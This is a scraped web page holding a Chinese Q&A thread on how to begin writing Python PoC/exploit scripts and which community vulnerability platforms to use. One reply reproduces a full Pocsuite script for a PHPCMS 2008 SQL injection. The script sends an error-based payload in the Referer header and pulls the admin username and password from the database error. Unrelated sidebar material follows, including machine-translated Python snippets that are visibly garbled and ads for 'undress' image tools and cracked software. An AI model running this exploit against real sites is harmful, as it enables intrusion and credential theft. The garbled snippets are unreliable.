찾다
백엔드 개발파이썬 튜토리얼基于 Python 来编写 Poc/Exp 该怎么入门?

之前看了一些公开的poc,有点蒙!
有没有入门教程!通过简单的实例演示下过程!
还有就是怎样结合poc的框架编写poc/exp?

回复内容:

噗嗤,看到大家都在宣传自家平台我就放心了。

这种社区化的漏洞验证脚本平台概念最早可能源于 Metasploit 社区,由安全研究人员自愿的利用官方提供的框架编写规范的漏洞验证脚本或者攻击脚本并发布到聚合中,由于框架强制性规范代码,使得各家产品能够轻松的调用“社区”编写的大量验证/攻击脚本,用来扫描、攻击、验证等用途。

我抛开宣传方面来说下对这种平台现状浅析以及未来的思考,国内 13-15 这两年涌出了大量的“社区化”PoC平台,当然可预测的是在未来的两年内会有关闭也会有新平台的出现。

部分列表(简介摘抄于 Description & Title):
  • beebeeto.com/ ::: Beebeeto是由众多安全研究人员所共同维护的一个规范化POC/EXP平台。
  • bugscan.net/ ::: 第一款基于社区的扫描器
  • vul.jdsec.com/ ::: 穷奇漏洞库是网络尖刀安全团队推出的一个用于漏洞信息存档的信息收集平台。
  • sebug.net/ ::: Sebug 是一个权威的漏洞参考、分享与学习的安全漏洞平台,是国内最早最权威的漏洞库。
  • tangscan.com/ ::: 唐朝安全巡航 (TangScan) 是一个由社区众多安全研究人员维护的企业在线安全平台,企业可以在 Tangscan 对自己的企业网络进行安全漏洞检测和监控以发现潜藏在网络里的重要安全问题。
  • ..

现在的框架是束缚,而不是舒服
在 Beebeeto 上线前的一年中,我对社区化的漏洞验证脚本平思考过尽可能多的细节(站在使用者、编写者、管理者的角度),当初设想为漏洞爆发 -> 代码编写 -> 脚本管理 -> 脚本利用 -> ... ,面对上面的流程我们推崇了 BBS 社区化,推出框架来强制规范编写者填写漏洞相关字段,对应函数体,为的是能够方便未来(现在的 Beehive)扫描器。之后安全行业涌出了多家社区化漏扫平台,我开始站在用户的角度去使用、编写他家的框架脚本,才意识到目前的框架是束缚,而不是舒服。它强制我填写每一个字段,而每个字段又需要去官方文档或者 Demo 代码中查看对应内容,例如 Beebeeto 中的 VulType ,强制要求编写者去查看官方文档寻找漏洞类型填写对应的英语版、漏洞描述等字段,事实上这些都是可以简化的,可能只需要一个 Referer。

刚好谈下关于 @Neargle 提到的:
所以真正起到功能的,也就不到十行的代码。

这句话是非常具备思考价值的,假如:
  • 如何在完成 PoC & Exploit 的过程中学习收获;
  • 在长期的编码漏洞利用脚本时,怎样达到最快速省事的编码;
  • 是否能够利用代码帮助编写者省去 Vulnerability_info 字段;
  • 快速验证,快速编写,快速发现需要写的漏洞;
  • 在已有的大量漏洞验证脚本里如何准确快速的进行重复概率查询;
  • ...

还有更多的问题现在摆在几家面前,需要解决。(省略三百字)

关于用户怎么入门编写
这些平台都在努力的让编写验证/攻击脚本变得轻松简单,教授着大量编写方法,最起码需要编写者具备相应语言的编码功底,其次对漏洞原理略知一二,基本就差不多了。多看多写,这是一个需要经验积累的过程,如果真的没有学会,思考下自身问题后再看看是不是这个平台/框架太烂了?最后,选择一个适合自己的平台很重要。

未来可能预见的几步曲:
  1. 漏洞爆发
  2. 详情发布
  3. 脚本发布
  4. 相关产品支撑
  5. 利益相关
  6. ...

嗯,现在我得告诉自己,用户不但很懒有时还很蠢。 这个看 sebug.net 导航帮助里有,Pocsuite 框架有详细过程。可以作为你的参考:) 最近也在写这种exp平台。接口和框架一直都是很麻烦的东西。

@Evi1m0 大神说的很有道理。真正起作用的可能就十来行代码,但是因为要考虑接口和其他一些细节,需要写很多很多多余的代码。

写这种exp的话,并不需要太多编程知识,只需要了解漏洞的原理,再加上一些很基础的语法,以及相应的库就好了。

感觉这种平台是一种趋势,自动化渗透能够减少很多繁琐的过程。并没有打广告,只是自己写了给自己用,谁用谁知道。 楼上三巨头出现了,还有谁还有谁。前排广告位。 楼上两位都帮自家宣传完了,我也帮别人家宣传宣传。

乌云tangscan,有详细的poc编写帮助文档,既能学习python,又能在过程中熟悉一些通用型漏洞的形成原因和利用方法,官网地址 tangscan.com

乌云出品,必属精品!也有比较好的奖励方式,每个月按照比例进行分红。比如你一次提交了几十个poc,之后的很多年你不提交也可以每个月 首先坐等Beebeeto。

然后来谈谈自己的看法:
其实吧,无论乌云的Tangscan也好,知道创宇的Pocsuite也好,还有Beebeeto也好(Bugscan没写过,不是特别了解不过应该差不多),关于Web的Poc和Exp,都极度依赖于两个Python库。
1. Requests : 模拟Web的请求和响应等交互动作。
2. Re : 正则表达式,用来验证返回的结果是否符合漏洞的预期,从而验证漏洞是否存在。

其余的大部分代码都是漏洞的信息。
以Pocsuite和Tangscan为例:
Pocsuite官方文档例子:
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '62274'  # ssvid
    version = '1'
    author = ['Medici.Yan']
    vulDate = '2011-11-21'
    createDate = '2015-09-23'
    updateDate = '2015-09-23'
    references = ['http://www.sebug.net/vuldb/ssvid-62274']
    name = '_62274_phpcms_2008_place_sql_inj_PoC'
    appPowerLink = 'http://www.phpcms.cn'
    appName = 'PHPCMS'
    appVersion = '2008'
    vulType = 'SQL Injection'
    desc = '''
        phpcms 2008 中广告模块,存在参数过滤不严,
        导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,
        如果关闭了错误显示,可以采用基于时间和错误的盲注
    '''
    samples = ['http://10.1.200.28/']

    def _attack(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
        head = {
            'Referer': payload
        }
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200:
            match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result.group(1)
                result['AdminInfo']['Password'] = match_result.group(2)
        return self.parse_attack(result)

    def _verify(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
        head = {
            'Referer': payload
        }
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
欢迎加入bugscan.
欢迎加入bugscan.
欢迎加入bugscan.
重要的话说三遍
bugscan.net
加入bugscan社区可以使用神器bugscan
所有的插件都是社区内部完全公开,学习写poc都是小意思
希望与你共同进步
성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
파이썬 어레이에서 수행 할 수있는 일반적인 작업은 무엇입니까?파이썬 어레이에서 수행 할 수있는 일반적인 작업은 무엇입니까?Apr 26, 2025 am 12:22 AM

PythonArraysSupportVariousOperations : 1) SlicingExtractsSubsets, 2) 추가/확장 어드먼트, 3) 삽입 값 삽입 ATSpecificPositions, 4) retingdeletesElements, 5) 분류/ReversingChangesOrder 및 6) ListsompectionScreateNewListSbasedOnsistin

어떤 유형의 응용 프로그램에서 Numpy Array가 일반적으로 사용됩니까?어떤 유형의 응용 프로그램에서 Numpy Array가 일반적으로 사용됩니까?Apr 26, 2025 am 12:13 AM

NumpyArraysareSentialplosplicationSefficationSefficientNumericalcomputationsanddatamanipulation. Theyarcrucialindatascience, MachineLearning, Physics, Engineering 및 Financeduetotheiribility에 대한 handlarge-scaledataefficivally. forexample, Infinancialanyaly

파이썬의 목록 위의 배열을 언제 사용 하시겠습니까?파이썬의 목록 위의 배열을 언제 사용 하시겠습니까?Apr 26, 2025 am 12:12 AM

UseanArray.ArrayOveralistInpyThonWhendealingwithhomogeneousData, Performance-CriticalCode, OrinterFacingwithCcode.1) HomogeneousData : ArraysSaveMemorywithtypepletement.2) Performance-CriticalCode : arraysofferbetterporcomanceFornumericalOperations.3) Interf

모든 목록 작업은 배열에 의해 지원됩니까? 왜 또는 왜 그렇지 않습니까?모든 목록 작업은 배열에 의해 지원됩니까? 왜 또는 왜 그렇지 않습니까?Apr 26, 2025 am 12:05 AM

아니요, NOTALLLISTOPERATIONARESUPPORTEDBYARRARES, andVICEVERSA.1) ArraySDONOTSUPPORTDYNAMICOPERATIONSLIKEPENDORINSERTWITHUTRESIGING, WHITHIMPACTSPERFORMANCE.2) ListSDONOTEECONSTANTTIMECOMPLEXITEFORDITITICCESSLIKEARRAYSDO.

파이썬 목록에서 요소에 어떻게 액세스합니까?파이썬 목록에서 요소에 어떻게 액세스합니까?Apr 26, 2025 am 12:03 AM

ToaccesselementsInapyThonlist, 사용 인덱싱, 부정적인 인덱싱, 슬라이스, 오리 화.

어레이는 파이썬으로 과학 컴퓨팅에 어떻게 사용됩니까?어레이는 파이썬으로 과학 컴퓨팅에 어떻게 사용됩니까?Apr 25, 2025 am 12:28 AM

Arraysinpython, 특히 비밀 복구를위한 ArecrucialInscientificcomputing.1) theaRearedFornumericalOperations, DataAnalysis 및 MachinELearning.2) Numpy'SimplementationIncensuressuressurations thanpythonlists.3) arraysenablequick

같은 시스템에서 다른 파이썬 버전을 어떻게 처리합니까?같은 시스템에서 다른 파이썬 버전을 어떻게 처리합니까?Apr 25, 2025 am 12:24 AM

Pyenv, Venv 및 Anaconda를 사용하여 다양한 Python 버전을 관리 할 수 ​​있습니다. 1) PYENV를 사용하여 여러 Python 버전을 관리합니다. Pyenv를 설치하고 글로벌 및 로컬 버전을 설정하십시오. 2) VENV를 사용하여 프로젝트 종속성을 분리하기 위해 가상 환경을 만듭니다. 3) Anaconda를 사용하여 데이터 과학 프로젝트에서 Python 버전을 관리하십시오. 4) 시스템 수준의 작업을 위해 시스템 파이썬을 유지하십시오. 이러한 도구와 전략을 통해 다양한 버전의 Python을 효과적으로 관리하여 프로젝트의 원활한 실행을 보장 할 수 있습니다.

표준 파이썬 어레이를 통해 Numpy Array를 사용하면 몇 가지 장점은 무엇입니까?표준 파이썬 어레이를 통해 Numpy Array를 사용하면 몇 가지 장점은 무엇입니까?Apr 25, 2025 am 12:21 AM

Numpyarrayshaveseveraladvantagesstandardpythonarrays : 1) thearemuchfasterduetoc 기반 간증, 2) thearemorememory-refficient, 특히 withlargedatasets 및 3) wepferoptizedformationsformationstaticaloperations, 만들기, 만들기

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

Video Face Swap

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

Dreamweaver Mac版

Dreamweaver Mac版

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

안전한 시험 브라우저

안전한 시험 브라우저

안전한 시험 브라우저는 온라인 시험을 안전하게 치르기 위한 보안 브라우저 환경입니다. 이 소프트웨어는 모든 컴퓨터를 안전한 워크스테이션으로 바꿔줍니다. 이는 모든 유틸리티에 대한 액세스를 제어하고 학생들이 승인되지 않은 리소스를 사용하는 것을 방지합니다.

에디트플러스 중국어 크랙 버전

에디트플러스 중국어 크랙 버전

작은 크기, 구문 강조, 코드 프롬프트 기능을 지원하지 않음

PhpStorm 맥 버전

PhpStorm 맥 버전

최신(2018.2.1) 전문 PHP 통합 개발 도구